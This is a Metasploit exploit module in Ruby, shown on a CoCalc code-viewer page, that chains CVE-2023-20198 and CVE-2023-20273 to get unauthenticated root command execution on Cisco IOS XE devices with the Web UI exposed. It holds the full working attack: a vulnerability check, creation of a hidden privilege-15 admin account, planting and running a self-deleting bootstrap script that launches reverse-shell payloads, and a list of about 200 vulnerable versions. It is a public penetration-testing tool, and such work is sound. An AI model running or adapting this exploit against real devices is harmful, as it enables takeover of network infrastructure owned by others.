CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
Views: 1904
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HTTP::CiscoIosXe
10
include Msf::Exploit::Remote::HttpClient
11
include Msf::Exploit::Retry
12
prepend Msf::Exploit::Remote::AutoCheck
13
14
def initialize(info = {})
15
super(
16
update_info(
17
info,
18
'Name' => 'Cisco IOX XE Unauthenticated RCE Chain',
19
'Description' => %q{
20
This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE
21
devices which have the Web UI exposed. An attacker can execute a payload with root privileges.
22
23
The vulnerable IOS XE versions are:
24
16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,
25
16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,
26
16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,
27
16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,
28
16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,
29
16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,
30
16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,
31
16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,
32
16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,
33
16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,
34
16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,
35
16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,
36
16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,
37
17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,
38
17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,
39
17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,
40
17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,
41
17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,
42
17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,
43
17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,
44
17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
45
17.11.99SW
46
},
47
'License' => MSF_LICENSE,
48
'Author' => [
49
'sfewer-r7', # MSF Exploit
50
],
51
'References' => [
52
['CVE', '2023-20198'],
53
['CVE', '2023-20273'],
54
# Vendor advisories.
55
['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z'],
56
['URL', 'https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'],
57
# Vendor list of (205) vulnerable versions.
58
['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml'],
59
# Technical details on CVE-2023-20198.
60
['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/'],
61
['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/'],
62
# Technical details on CVE-2023-20273.
63
['URL', 'https://blog.leakix.net/2023/10/cisco-root-privesc/'],
64
# Full details of a successful exploitation attempt from a honey pot.
65
['URL', 'https://gist.github.com/rashimo/a0ef01bc02e5e9fdf46bc4f3b5193cbf'],
66
],
67
'DisclosureDate' => '2023-10-16',
68
'Privileged' => true,
69
'Platform' => %w[linux unix],
70
'Arch' => [ARCH_CMD],
71
'Targets' => [
72
[
73
# Tested against IOS XE 16.12.3 and 17.3.2 with the following payloads:
74
# cmd/linux/http/x64/meterpreter/reverse_tcp
75
# cmd/linux/http/x64/shell/reverse_tcp
76
# cmd/linux/http/x86/shell/reverse_tcp
77
'Linux Command',
78
{
79
'Platform' => 'linux',
80
'Arch' => [ARCH_CMD]
81
},
82
],
83
[
84
# Tested against IOS XE 16.12.3 and 17.3.2 with the following payloads:
85
# cmd/unix/python/meterpreter/reverse_tcp
86
# cmd/unix/reverse_bash
87
'Unix Command',
88
{
89
'Platform' => 'unix',
90
'Arch' => [ARCH_CMD]
91
},
92
]
93
],
94
'DefaultTarget' => 0,
95
'DefaultOptions' => {
96
'RPORT' => 443,
97
'SSL' => true
98
},
99
'Notes' => {
100
'Stability' => [CRASH_SAFE],
101
'Reliability' => [REPEATABLE_SESSION],
102
'SideEffects' => [IOC_IN_LOGS]
103
}
104
)
105
)
106
107
register_options(
108
[
109
# We allow a user to specify the VRF name to route traffic for the payloads network transport. The default of
110
# 'global' should work, but exposing this as an option will allow for usage in more complex network setups.
111
# A user could leverage the auxiliary module auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 to
112
# inspect a devices configuration to see an appropriate VRF to use.
113
OptString.new('CISCO_VRF_NAME', [ true, "The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.", 'global']),
114
# We may need to try and execute a command a second time if it fails the first time. This option is the maximum
115
# number of seconds to keep trying.
116
OptInt.new('CISCO_CMD_TIMEOUT', [true, 'The maximum timeout (in seconds) to wait when trying to execute a command.', 30])
117
]
118
)
119
end
120
121
def check
122
# First, a get request to the root of the Web UI, this lets us verify the target is a Cisco IOS XE device with
123
# the Web UI exposed (which is the vulnerable component).
124
res = send_request_cgi(
125
'method' => 'GET',
126
'uri' => normalize_uri('webui')
127
)
128
129
return CheckCode::Unknown('Connection failed') unless res
130
131
# We look for one of two identifiers to ensure the request to /webui above returns something with Cisco in the content.
132
if res.code != 200 || (!res.body.include?('Cisco Systems, Inc.') || !res.headers['Content-Security-Policy']&.include?('cisco.com'))
133
return CheckCode::Unknown('Web UI not detected')
134
end
135
136
# By here we know the target is the IOS XE Web UI. We leverage the vulnerability to pull out the version number,
137
# so if this request succeeds, then we known the target is vulnerable.
138
res = run_cli_command('show version', Mode::PRIVILEGED_EXEC)
139
140
# If the above request failed, then the target is safe.
141
return CheckCode::Safe unless res
142
143
version = 'Cisco IOS XE Software'
144
145
# If we can pull out the version number via a regex, we do. If this fails, the target is still vulnerable
146
# (as the above call to run_cli_command succeeded), however maybe this firmware version uses a different format
147
# for the version information so our regex wont work.
148
# Note: Version numbers can have letters in them, e.g. 17.11.99SW or 16.12.1z2
149
if res =~ /(Cisco IOS XE Software, Version \S+\.\S+\.\S+)/
150
version = Regexp.last_match(1)
151
end
152
153
CheckCode::Vulnerable(version)
154
end
155
156
def exploit
157
admin_username = rand_text_alpha(8)
158
admin_password = rand_text_alpha(8)
159
160
# Leverage CVE-2023-20198 to run an arbitrary CLI command and create a new admin user account.
161
unless run_cli_command("username #{admin_username} privilege 15 secret #{admin_password}", Mode::GLOBAL_CONFIGURATION)
162
fail_with(Failure::UnexpectedReply, 'Failed to create admin user')
163
end
164
165
begin
166
print_status("Created privilege 15 user '#{admin_username}' with password '#{admin_password}'")
167
168
# Leverage CVE-2023-20273 to run an arbitrary OS commands and bootstrap a Metasploit payload...
169
170
# A shell script to execute the Metasploit payload. Will delete itself upon execution.
171
bootstrap_script = "#!/bin/sh\nrm -f $0\n#{payload.encoded}"
172
173
# The location of our bootstrap script.
174
bootstrap_file = "/tmp/#{Rex::Text.rand_text_alpha(8)}"
175
176
# NOTE: Rather than chaining the commands with a semicolon, we run them separately. This allows version 16.* and
177
# 17.8 to work as expected. Version 16.* did not work when semi colons were present in the command line.
178
179
# Write a script to disk which will execute the Metasploit payload. We base64 encode it to avoid any problems
180
# with restricted chars, and leverage openssl to decode and write the contents to disk.
181
success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do
182
next run_os_command("openssl enc -base64 -out #{bootstrap_file} -d <<< #{Base64.strict_encode64(bootstrap_script)}", admin_username, admin_password)
183
end
184
185
unless success
186
fail_with(Failure::UnexpectedReply, 'Failed to plant the bootstrap file')
187
end
188
189
# Make the script executable.
190
success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do
191
next run_os_command("chmod +x #{bootstrap_file}", admin_username, admin_password)
192
end
193
194
unless success
195
fail_with(Failure::UnexpectedReply, 'Failed to chmod the bootstrap file')
196
end
197
198
# Execute our bootstrap script via mcp_chvrf.sh, and with 'global' virtual routing and forwarding (vrf) by
199
# default. The VRF allows the executed script to route its network traffic back the framework. The map_chvrf.sh
200
# scripts wraps a call to /usr/sbin/chvrf, which will conveniently fork the command we supply.
201
success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do
202
next run_os_command("/usr/binos/conf/mcp_chvrf.sh #{datastore['CISCO_VRF_NAME']} sh #{bootstrap_file}", admin_username, admin_password)
203
end
204
205
unless success
206
fail_with(Failure::UnexpectedReply, 'Failed to execute the bootstrap file')
207
end
208
ensure
209
print_status("Removing user '#{admin_username}'")
210
211
# Leverage CVE-2023-20198 to remove the admin account we previously created.
212
unless run_cli_command("no username #{admin_username}", Mode::GLOBAL_CONFIGURATION)
213
print_warning('Failed to remove user')
214
end
215
end
216
end
217
218
end
219
220